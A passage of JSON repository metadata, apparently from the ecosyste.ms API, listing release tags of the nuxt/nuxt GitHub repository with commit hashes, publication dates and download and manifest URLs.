url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"@nuxt/ui-templates@1.3.1","sha":"26a0745b9cc3a60aa8bf86c74ab3ff7ec4717058","kind":"tag","published_at":"2023-07-29T03:33:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1/manifests"},{"name":"@nuxt/ui-templates@1.3.0","sha":"039126dac7070eeae2eae16fcb423f6b77a4fc0d","kind":"tag","published_at":"2023-07-28T16:37:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0/manifests"},{"name":"@nuxt/ui-templates@1.2.1","sha":"57e237b03ecb63319727dd407f01be6c6540deab","kind":"tag","published_at":"2023-07-26T09:19:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"@nuxt/ui-templates@1.2.0","sha":"5f6e505ea476ed8ede4edbd4d1fb3dcae0189705","kind":"tag","published_at":"2023-06-20T11:29:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"@nuxt/ui-templates@1.1.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1/manifests"},{"name":"@nuxt/ui@0.4.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"@nuxt/ui-templates@1.1.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0/manifests"},{"name":"@nuxt/ui-assets@0.2.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositor